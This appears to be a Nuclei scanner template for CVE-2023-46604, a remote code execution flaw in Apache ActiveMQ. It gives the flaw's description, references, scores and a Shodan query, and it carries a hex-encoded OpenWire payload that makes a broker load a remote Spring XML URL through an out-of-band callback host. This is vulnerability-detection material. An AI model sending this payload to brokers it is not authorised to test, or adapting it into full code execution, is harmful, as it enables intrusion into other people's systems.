id: CVE-2023-46604 info: name: Apache ActiveMQ - Remote Code Execution author: Ice3man,Mzack9999,pdresearch severity: critical description: | Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath. Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue. reference: - http://www.openwall.com/lists/oss-security/2023/10/27/5 - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt - https://github.com/X1r0z/ActiveMQ-RCE - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog - https://paper.seebug.org/3058/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H cvss-score: 10 cve-id: CVE-2023-46604 cwe-id: CWE-502 epss-score: 0.00053 metadata: max-request: 1 shodan-query: product:"ActiveMQ OpenWire Transport" verified: true tags: cve,cve2023,network,rce,apache,activemq,deserialization variables: prefix: "1f00000000000000000001010042" classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401" final: "{{prefix}}{{classname}}" tcp: - inputs: - data: "{{hex_decode('00000'+dec_to_hex(len(final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}')))+final+'00'+dec_to_hex(len('http://{{interactsh-url}}'))+hex_encode('http://{{interactsh-url}}'))}}" host: - "{{Hostname}}" port: 61616 matchers-condition: and matchers: - type: word part: interactsh_protocol - "http" - type: word words: - "ActiveMQ" - "StackTraceEnabled" condition: and # digest: 4b0a00483046022100f363443cf43dcc6cfff466d9b2f2606a19f6366bf864994566b83a1b1a62b524022100886785b126a725f1ea5ff4295d1d61cfc9767f17a1a5de7d28c16744f15d1bfe:922c64590222798bb761d5b6d8e72950